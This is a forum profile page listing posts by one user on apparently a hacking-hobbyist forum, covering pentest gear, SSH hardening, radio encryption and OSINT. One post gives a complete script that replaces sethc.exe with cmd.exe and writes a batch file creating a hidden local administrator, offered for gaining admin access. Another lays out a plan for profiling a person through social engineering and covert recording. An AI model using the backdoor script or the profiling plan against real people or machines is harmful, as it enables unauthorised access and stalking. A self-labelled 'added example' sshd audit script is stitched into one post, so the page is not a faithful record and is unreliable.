About Kentj

  • Rank
    Hak5 Fan


  1. I would say, it depends a lot... Are we talking about a vulnerability test, or a penetration test? Running a scan for vulns, missing patches, or weak passwords is one thing; running a full test is quite different. And, what is the scope for a test, how "far" are you allowed to go? When it comes to equipment, a good laptop running Kali, some Alfa wireless cards, and you've got the basic gear you'll need. Everything else is just "nice to have", not "need to have". But for "nice to have": a Rubber Ducky / Bunny, an Odroid C2 and some lockpicks 😄 (and a veeeery patient boss) /Kent
  2. Kentj

    DNS problem ?

    Hi guys 🙂 Got somewhat of a rookie problem. Rented a new VPS, based on Debian 9, and hooked it up to my DNS. My primary site / domain is www.labet.dk, the server is downloads.labet.dk. The strange thing is, if I try to ping it on downloads.labet.dk, I get a response from the right IP, but in DNS it shows up as mail.darrenmusic.com. When I log in and run a netstat -a, this is the output:

    root@downloads:~# netstat -a
    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address Foreign Address State
    tcp 0 0* LISTEN
    tcp 0 0* LISTEN
    tcp 0 172 mail.darrenmusic.c:2222 80-197-123-156-ca:44938 ESTABLISHED
    tcp 0 0 mail.darrenmusic.:50180 m2420.contaboserve:http TIME_WAIT
    tcp6 0 0 [::]:2222 [::]:* LISTEN
    udp 0 0*
    Active UNIX domain sockets (servers and established)
    Proto RefCnt Flags Type State I-Node Path
    unix 2 [ ] DGRAM 13824 /run/systemd/cgroups-agent
    unix 2 [ ACC ] STREAM LISTENING 13828 /run/systemd/private
    unix 2 [ ACC ] STREAM

    I can't seem to find any services configured to mail.darrenmusic.com, so right now I'm really lost. Any thoughts would be really welcome... Sorry for asking rookie questions 🙂
  3. Kentj

    hack mah school

    Enter stage left, grumpy old man, MUPPET SHOW THEME PLAYING... Young man... listen up, and listen veeeery carefully. Since RKiver gave you the short version, and right now you're wondering why, I'll give it a try. Since you haven't gotten permission, don't do anything to those machines. Just bypassing login restrictions would be a crime. Launching any kind of exploit, botnet, or malware is a crime. Since you don't know what you're doing, it's a real disaster waiting to happen... period. Go do your learning on a virtual lab, or a private lab network, not on your school's gear. But you could try and ask the network staff if you can give them a hand, because you want to learn, and maybe someday be an admin yourself. Some of them might actually think it's cool, and start you in the right direction. Exit stage right, grumpy old man
  4. Kentj

    sshd config Q

    Sorry for posing a stupid question... but why? You can set up the client to not connect if the server is not in known_hosts, but as far as I see it, SSH won't function properly without sending the server's public key. I'm not sure, but I really can't see the point in it either ;) If it's a matter of security, set key auth only, and disable ordinary password login. Throw some fail2ban in front of it, and you should be fairly safe :)
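One way to check that a server actually matches the advice in this reply (key auth only, password logins off), as an added example that is not part of the original post: a small POSIX sh audit of sshd_config. The two config files are constructed for the demo; the hypothetical helper names sshd_effective and audit_sshd are mine, and fail2ban is out of scope here.

```shell
#!/bin/sh
# Added example, not from the original thread: audit an sshd_config for the
# "key auth only, no password login" setup the reply recommends.
# Both config files below are constructed for the demo (assumptions, not real hosts).
GOOD_CFG=$(mktemp)
cat > "$GOOD_CFG" <<'EOF'
# constructed: hardened config
Port 2222
PubkeyAuthentication yes
PasswordAuthentication no
KbdInteractiveAuthentication no
# later duplicate: sshd keeps the first value above, so this one is ignored
PasswordAuthentication yes
EOF
WEAK_CFG=$(mktemp)
cat > "$WEAK_CFG" <<'EOF'
# constructed: stock-looking config that still allows password logins
#PasswordAuthentication no
PubkeyAuthentication yes
EOF

# sshd_effective FILE KEYWORD: print the value sshd will use for KEYWORD.
# The first uncommented occurrence wins, keywords are case-insensitive, and
# everything after the first Match block is conditional, so we stop there.
sshd_effective() {
    awk -v key="$2" '
        tolower($1) == "match" { exit }
        tolower($1) == tolower(key) { print tolower($2); exit }
    ' "$1"
}

# audit_sshd FILE: return 0 if only public-key auth is reachable, 1 otherwise,
# printing one FAIL line per finding. Unset keywords are compared against the
# OpenSSH defaults (pubkey yes, password yes, keyboard-interactive yes).
audit_sshd() {
    rc=0
    pk=$(sshd_effective "$1" PubkeyAuthentication)
    pw=$(sshd_effective "$1" PasswordAuthentication)
    # ChallengeResponseAuthentication is the pre-8.7 name of KbdInteractiveAuthentication
    kbd=$(sshd_effective "$1" KbdInteractiveAuthentication)
    [ -n "$kbd" ] || kbd=$(sshd_effective "$1" ChallengeResponseAuthentication)
    [ "${pk:-yes}" = "yes" ] || { echo "FAIL: PubkeyAuthentication is $pk"; rc=1; }
    [ "${pw:-yes}" = "no" ]  || { echo "FAIL: PasswordAuthentication is ${pw:-yes (default)}"; rc=1; }
    [ "${kbd:-yes}" = "no" ] || { echo "FAIL: keyboard-interactive is ${kbd:-yes (default)}; PAM can still prompt for a password"; rc=1; }
    return $rc
}

audit_sshd "$GOOD_CFG" && echo "$GOOD_CFG: key-only, OK"
audit_sshd "$WEAK_CFG" || echo "$WEAK_CFG: password logins still possible"
```

Run it against /etc/ssh/sshd_config on a real host; a commented-out `#PasswordAuthentication no` is the classic false sense of security the weak sample reproduces.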
  5. Or, just boot from a Kali Live system, mount the Windows drive.

    ------------sethcpatch.sh v2 start--------------
    #! /bin/bash
    # cmd.exe --> sethc.exe copy patch
    # Target Windows XP - 10, Windows Server 2k, 2k3, 2k8, untested on Server 2016
    # Version 0.2 - June 2018
    # By kent j <kent@labet.dk>

    HELP() {
        echo "Run with patchwin / unpatchwin"
    }

    PATCH_WIN() {
        echo "patching windows sethc function...."
        sleep 2
        mkdir patch
        cp sethc.exe patch/sethc.bak
        cp cmd.exe patch/cmd.bak
        rm sethc.exe
        cp cmd.exe sethc.exe
        echo "patching done ......"
        sleep 2
        echo "Writing windows bat file..."
        cd patch
        touch useradd.bat
        echo "net user /add USER PASS" >useradd.bat
        echo "net localgroup administratorer USER /add" >>useradd.bat
        cd ..
        sleep 2
        echo "useradd.bat written to c:\windows\system32\patch\useradd.bat"
        echo "Run with useradd.bat"
        sleep 2
    }

    UNPATCH_WIN() {
        echo "unpatch Windows sethc.exe"
        sleep 2
        rm sethc.exe
        rm cmd.exe
        cd patch
        cp sethc.bak ../sethc.exe
        cp cmd.bak ../cmd.exe
        cd ..
        rm -rf patch
        sleep 2
        echo "Cleanup ended !"
        echo "sethc.exe & cmd.exe back to normal..."
        echo "Script terminated... "
    }

    case $1 in
        help) HELP ;;
        patchwin) PATCH_WIN ;;
        unpatchwin) UNPATCH_WIN ;;
    esac
    exit 0
    -----------------sethcpatch.sh v2 End------------------

    Just add this to a custom Kali under /opt/tools/local/win (or wherever you like). Makes your life soo much easier when users are forgetting their passwords :D For use, copy it to the local Windows drive and run it. When in the Windows terminal, run the bat file. Log in, and enjoy admin privs :) /Kent
  6. Just some quick thoughts? For demo purposes, I would recommend a laptop running dual Alfa wifi cards, as it's easier to use a laptop if something goes wrong, or you need to adapt. I usually do it that way, and keep the HAK5 stuff for easy deployment on field tests if need be. But, as for showing the dangers of wifi, I would say you're on the right track, if you can demonstrate deployment of malware, capturing credentials, DNS spoofing, JavaScript injection and stuff like that. Just simple stuff, but with an impact nonetheless. It really shows why you shouldn't be using the network at McD or Starbucks without a VPN? Something like DNSchef, Beef-Xss, Metasploit and the Blackeye captive portal comes to mind? As far as using videos, I think you're right. Better to make mistakes "live" than using a video. It better demonstrates what can be done and the tech behind it. Even though I failed at a demo, and had to try a second time, it gave everybody an opportunity to talk about the tech behind it, why it failed, what to do about it, and so on. So what could have been a disaster ended up being a really nice talk with the people present about a lot of stuff related to security, and the ideas and technologies behind the demo.
  7. If by doing sshfs you mean mounting the PS as a hard drive from a workstation using ssh, yep, it can. Just make a mount point on the workstation, and mount as usual: sshfs packet_squirrel_ip:/ /mount/point then you can find the PS under /mount/point. If it works the other way around, mounting the workstation as a remote drive on the PS, I haven't tried that. If the PS has sshfs installed, it should. But using the PS as a remote drive does work, so editing payloads is pretty easy :)
  8. A solution could be to set up your own OpenVPN server. It isn't that hard to do and it could give you some time to confirm it works as it should. I've tested a private VPN solution based on OpenVPN, from Linux workstations, and see no leaks from it. But, as with any kind of VPN solution, it's possible to sniff the traffic at the gateway, if not encrypted from that point forward. But it should get you through the Chinese firewall. As for phones, hmm. Anything on a GSM network could possibly be monitored by the government. Something like Jitsi IM and encrypted video chat through VPN comes to mind, depending on your situation. But, as Digininja pointed out, it depends on what resources they want to spend on it, and would they bother for an ordinary businessman, conducting legal business in China? I guess you would be fine, just with an ordinary VPN solution, combined with some kind of encrypted messenger / video call.
  9. How do you mean, "relates to companies"?

    OSINT - Open Source Intelligence gathering (collecting info from open / public sources)
    HUMINT - Human Intelligence gathering (info from people on the ground / human sources)
    CYBINT - Cyber intelligence
    SIGINT - Signal Intelligence gathering
    TECHINT - Analysis of technical capabilities of an enemy
    MEDINT - Medical records / information
    FININT - Financial information

    So OSINT is just the CIA's catchy term for gathering data from publicly available sources? Directed at a person, it would be using every publicly known source to gather info on that person or group. <Stalkerish mode ON> Websites, social media, phonebooks, public records, news sites / magazines and papers. <Stalkerish mode OFF> For keeping track of these records, and building a picture of how it relates, I would suggest "maltego" and "casefile"; they were made for this, and really are a great help in organising the information in a logical order. Start thinking of yourself as an example. What information is out there on you? What kind is it (phone number, email, medical, address and so on)? Who has this information, and who can access it, and access it under what circumstances? How do you get to it? Because it will help you to start thinking about what's out there on you, and how to protect it. But, more important, it will help you build a list of most types and sources of information that applies to everyone else. If it were me that had to launch an operation into someone, it would most likely go something like this.

    OSINT PHASE (Passive phase)
    Phonebooks, websites, social media, professional networks, public records of ownership of buildings, and placement of buildings
    Public listed address
    Public listed phone number
    Public listed email & messenger handles
    Get photos, known whereabouts / favourite places they visit
    Job / education, what and where
    Have they published anything (books, papers, assignments and the like)

    HUMINT (Active recon phase)
    Friends?, coworkers?, relatives?
    Gossip at the places they visit?
    Directed social engineering attacks
    Photo, video, audio gathering if necessary

    TECHINT
    Technical equipment they have access to (laptops, phones, workstations)
    Where do they use it and for what?

    CYBINT
    Closer look at websites / social media profiles

    When done, all of this should provide you with information that can help you to build a profile, and find out where to direct your attention next. Direct attack campaigns if that is to your liking, which I really wouldn't recommend. But if you're working in an efficient, directed manner, you would be amazed at what info is actually out there, if you go about getting it in a coordinated, effective manner. If not anything else, it's a fun task. "Good luck double o seven, and do try to bring the gadgets back home to Q branch safely :D"
  10. Hmm, there would have to be a waveform of some sort. As I see it, it would be something like talkvoice ----> mic ---> Encryption PCB ---> transmitter --------> AIR <------- Receiver ----> Decryption PCB --> speaker ---> Ear? As far as I understand it, in some cases the encryption function is just a base tone, some modulator function, and the transmission of the generated signal. It should / could be possible to reconstruct the signal from the base, figure out what kind of modulation it is, apply it to the transmitted signal, and recover the clear voice signal. https://www.midians.com/specs/voice-scramblers-motorola-mototrbo-radios/vs-1000-mt1 Here are some encryption PCBs for Motorola truncated radios. They use, as far as I can tell, "just" some kind of filtration and modulation as encryption. I would imagine, at least theoretically, the encrypted voice from these can be recovered through trial and error, and massive computing power maybe? If I understand the description of these correctly, they simply just run the base voice through some kind of known modulation filter, remove the sum, and transmit the difference in frequencies. If that's understood correctly, maybe it could be recovered by finding the base frequency and applying filters until you have clear audio again. Just my thoughts on this. If I'm correct or not, I can't say?
  11. Practically, no, it's not possible to crack the system keys on truncated radio. The simplest way would simply be to get hands on a radio you know is operating within the radio group / organisation you want to monitor, or bribe someone who knows what it is. Finding it with bruteforce will cost a lot of time and special / custom software. And even in situation one, most radios are locked / protected from reading and changing the encryption keys & channel info, so no luck there. Depending on what radio system it is, some radios also employ key / authentication services, so unknown devices will never be approved on the system, and lost systems will get locked out from the radio network, so no luck there either. I know it sounds fun, but I should mention it's illegal in most countries to monitor police / fire department radios when they are encrypted, or to try to crack the encryption. Some info on truncated radio security mechanisms: https://www.rrmediagroup.com/Features/FeaturesDetails/FID/812 I would imagine it's impossible to recreate the transmission without the encryption / scrambler key, the same radio model, running on the same frequencies, and with the correct keys programmed into the scrambler / encryption module. Sorry, didn't want to spoil your day, but from what I've found out, it's simply too costly and too much work to bother with it? /Kent
  12. Yes there is. You simply post a sign saying "no cellphones", confiscate them if they have them, and give them back after the event is over. If you don't want them to send data out, don't give them a hotspot to begin with. As far as blocking cellphone comms, forget it. Just trying to do so is illegal (think personal / micro GSM cell site tower routing data and calls to a black hole in the ground). If they use your wifi, you can try and log the data in transit, and only IF you tell them you do so, and they accept some form of monitoring in the case they are using your wifi. But, even so, it's wrong to do so, and it's easy for them to bypass (VPN anyone?). It can be done, but not legally. I would highly suggest you think of another way all in all, and your boss does the same. Easier to forbid the use of cellphones during the event. But for corporate espionage into the competition, well, that's another game, something you have to research for yourself. Just don't come crying here when both of you end up behind bars? /Kent
  13. (Taking on the tinfoil hat) Maybe it's just me being paranoid here, but storing confidential data offsite (3rd party provider), and no encryption? No way, no matter who it is. For a small organisation, I would say: privately owned and run server, LUKS drives, and SSHFS, with gpg as an extra layer for individual file encryption. Some realtime monitoring for file read/write (inotify), and you're on your way :) Depending on the workstations, LUKS and the LUKS-Nuke option; maybe try looking into luks-TPM or OpenPGP smartcards and LUKS, and you're well on your way to something secure :) (Taking off the tinfoil hat again)
  14. I would agree with what others have said. 10 miles ain't gonna happen with wifi. Custom built yagi at each end, and maybe... just maybe you'll get 2-3. Using a yagi and a 2 watt wifi card, I've got 1500 m (across the local harbour, with 1 building in between on one side). A much better route, as others have suggested, would be a small 12 volt system, in a case, with batteries, and a cellphone modem. A quick reverse ssh connection to an ssh server somewhere, and you're in business :) Rig the case with a mercury emergency switch, some LUKS encryption, and you're also secured from theft and tampering :D A small footprint system, some Kali, a modem, a yagi, and a powerful wifi card. Should be some seriously fun hours with that project :)